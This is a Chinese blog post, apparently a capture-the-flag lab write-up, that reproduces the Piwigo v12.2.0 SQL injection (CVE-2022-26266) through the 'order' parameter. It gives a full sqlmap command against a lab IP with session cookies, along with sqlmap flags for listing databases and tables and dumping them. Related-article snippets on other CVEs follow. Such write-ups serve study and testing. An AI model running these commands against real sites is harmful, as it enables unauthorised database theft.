Piwigo SQL注入 (CVE-2022-26266)

最新推荐文章于 2024-08-25 22:36:40 发布
最新推荐文章于 2024-08-25 22:36:40 发布
阅读量228 收藏
点赞数 2
分类专栏: # SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140514341
版权

一、漏洞概述

Piwigo 是网络端的开源相册程序。 专为组织、团队与个人设计。
Piwigo v12.2.0 被发现包含通过 pwg.users.php 的 SQL 注入漏洞。
数据库名/用户名/密码:piwigo/root/root
SQL注入字段存在:order

二、影响范围

Piwigo v12.2.0

三、访问页面

根据提示安装程序,访问登录。

四、漏洞复现

1、使用sqlmap,带上cookie。

sqlmap.py -u "http://123.58.224.8:37816/ws.php?format=json&method=pwg.users.getList" --data="display=all&order=id&page=0&per_page=5&exclude%5B%5D=2" --cookie="metabase.DEVICE=47be73da-b525-49e6-beec-0c5b291b2e3c; _ga=GA1.1.2097748309.1721011407; SESS9890766374cce7ed90756faa2aa6065d=IbwPbdjotdEpjtogcme_xcduDhzaKwKwMM6M4oZKDis; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_516d7fbaaec4b2edc7517409f91d089e=aaa%7C1722472664%7CIRe36BPx2YZn9GlytmWyghV2zLcUi5fkm2Dukag44Jr%7C5871434765de65b3418eea5eee5db034ee09f40abb2452095644b1f87a059558; wp-settings-time-1=1721263481; PHPSESSID=4ngaqlnchdrjaoueld1d08g0c2; youdianMenuTopID=2; pwg_id=9qk7g48vtql24cqgglp3q0oetv; pwg_user_manager_view=line" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --referer="http://123.58.224.8:37816/admin.php?page=user_list" --delay=0 --timeout=30 --retries=0 --level=3 --risk=1 --threads=1 --time-sec=5 --technique=BEUSTQ -b --batch --answers="crack=N,dict=N,continue=Y,quit=N"

2、发现注入点

3、确定有sql注入,接下来就是熟悉的操作

sqlmap常用命令:
1、--dbs 获取数据库
2、--tables 获取数据库中所有的表 
3、--columns 参数用来获取字段
4、--dump 获取值

-D '数据库名' -T '表名' -C '字段名1,字段名2' --dump

4、flag在哪(这并不重要)

风中追风-fzzf
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring RCE 漏洞 CVE-2022-22965 的终极解决方案
oscar999的专栏
04-01 1万+
Spring框架爆出的RCE(远程命令执行)漏洞,现在这个漏洞有了统一的编号: **CVE-2022-22965**。 这个漏洞的主要原因是在JDK 9+版本里,Spring MVC 的数据绑定时出现的漏洞。
【密钥泄漏】CVE-2022-29266 Apache Apisix jwt插件
HBohan的博客
04-29 913
漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 漏洞版本 Apache Apisix < 2.13.1 插件开启 在这里给大家演示的是Dashboard页面开启jwt插件。 1、当我们环境搭建完毕后、通过访问http://127
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8931
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
[PHP代码审计]Piwigo11.4.0存在SQL注入漏洞
Y4tacker的博客
06-03 1045
文章目录Piwigo11.4.0存在SQL注入漏洞写在前面分析 Piwigo11.4.0存在SQL注入漏洞 写在前面 国内的不够玩了,玩玩国外的,不过刚找到一个最后告诉我,被交了,好吧为了高大一点教大家一个收集自己装备库的方法 分析 我们查看提交记录,点我直达,发现有一个fix是关于sql注入的 那么我们安装好以后去看一眼,首先是首行的两个参数过滤 觉得很好玩给大家看一眼 限制为数字,好了不多吹牛逼了,看下面正题 首先是接收order参数保证二维数组的[0][column]有值并赋值给变量$col,
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
HongYu012的博客
04-01 3005
1.漏洞描述 漏洞名称 Spring Framework远程代码执行漏洞 公开时间 2022-03-29 更新时间 2022-03-31 CVE编号 CVE-2022-22965 其他编号 QVD-2022-1691 威胁类型 远程代码执行 .
【春秋云镜】CVE-2022-23366 Hospital Management Startup 1.0 sqli 解题思路
Dark-Specter的博客
12-15 892
到这一步,我们可以知道目标网站的登录页面,提交表单的时候有注入点,然后接下来用sqlmap直接脱库就可以,以下给大家整理出来的常用的命令,因为时间盲注这块第一次爆库是一个漫长的等待过程(如果目标数据库多的话),我都是边看美女边等待。抓到的包保存到可以找到的路径,命名为xxx.txt(名字随意),以我这边为例,因为我这sqlmap是在wsl kali环境里,我就直接命名CVE-2022-23366.txt保存至我的桌面(保存下来的操作就不细细展开截图了)爆字段里的内容,拿到flag。2、sqlmap脱库。
Piwigo 开源相册系统-PHP
06-20
</p><p>Piwigo 2.5 数据: 30+ 新功能, 由百名翻译人员及7名开发人员带来的 900+ 代码变更, 4种新增语言使 Piwigo 的语言种类增至 51种,8个月的开发时间。</p><p> </p><p>产品特点:</p><p>上传你的照片</p><p>...
docker-piwigo
05-27
Piwigo-Docker 这是piwigo的图像,与mysql数据库链接。 数据必须存储在一个卷上。 特征 使用docker-compose轻松部署Piwigo。 部署方式 编辑此docker-compose.yml并使用命令$ docker-compose up -d docker-compose....
piwigo-videojs安装说明和必须安装的软件
03-13
我这里介绍的是piwigo-videojs,视频插件,我在安装时候走了很多弯路,这里先说下 Piwigo 11.3.0 是支持本插件的 php.ini需要开启 system,putenv,shell_exec 这三个权限 视频生成缩略图,由于主机设置PHP程序执行...
simple-theme-piwigo:piwigo的简单主题
04-09
上仍然可以使用旧版本( Simple Grey ),并且由Piwigo团队进行维护。特征React灵敏HTML5和CSS3, 使用, 使用Open Sans字体。下载在Piwigo的管理界面中使用内置的主题管理器, 或下载档案并将其解压缩到your-...
linux-kali内核提权漏洞复现(CVE-2022-0847)
tlovejr的博客
03-08 2275
linux-kali内核提权漏洞复现(CVE-2022-0847) 漏洞介绍 这是 CVE-2022-0847 的故事,它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复。 漏洞影响版本 Linux kali 5.10.0-kali7-amd64 #1 S
Apache Apisix jwt插件 (CVE-2022-29266) 密钥泄漏
m0_60732362的博客
04-25 2318
# CVE-2022-29266 Apache Apisix jwt插件 密钥泄漏 ## 漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 ## 漏洞版本 Apache Apisix < 2.13.1 ##
SQL 时间盲注 (injection 第十六关)
baishiqi12的博客
08-20 540
SQL 注入,仅供参考
PostgreSQL案例:planning time超长问题分析
liuzhilong的博客
08-21 989
库总是OOM,分析到是执行计划生成有问题,planning time 1秒,planning shared hit 100w。一通分析,定位到是统计信息基表pg_statistic膨胀,由于会话首次SQL执行时的CatCacheMiss,导致backend访问并缓存了pg_statistic过多的死元组数据。应用连接总会启用新会话,多个backend的总内存过大从而导致OOM。
SQL-DCL-数据控制语言
DEVIL_hym的博客
08-23 235
一、 DCL-管理用户。二、DCL-权限控制。
HeidiSQL中一些简单mysql语句的含义(一)
2201_75345199的博客
08-23 561
创建一个数据库,这个是数据库的名字叫java62#删除数据库java62#查看当前mysql里的所有数据库#创建student表,varchar括号里的是字符串的长度#查看当前数据库里有哪些表#删除student表。
关于超长字符串/文本对应的数据从excel导入到PL/SQL中的尝试
最新发布
qq_44835418的博客
08-25 273
时, clob会自动把类型转换为varchar2(4000)类型,也就是clob字段使用insert into时也会限制字节数不超过4000, 而如果手动粘贴复制时,则不存在限制4000字节的问题。因为想了好久,也不能在python脚本中将读取到的CLOB类型长文本数据变成可以全部保留数据的格式生成对应的sql代码,所以我选择了截取不超过4000的部分的数据来生成INSERT INTO代码, 然后再去PL/SQL上执行SQL, 然后看看那些有被截取, 被截取的我在手动的复制粘贴补充完整。
docker部署piwigo
12-18
要使用Docker部署Piwigo,首先需要安装Docker引擎。Docker引擎是一种容器化平台,可以轻松地部署和管理应用程序。以下是部署Piwigo的步骤: 第一步是通过Docker Hub下载Piwigo镜像。可以使用以下命令: ``` docker ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值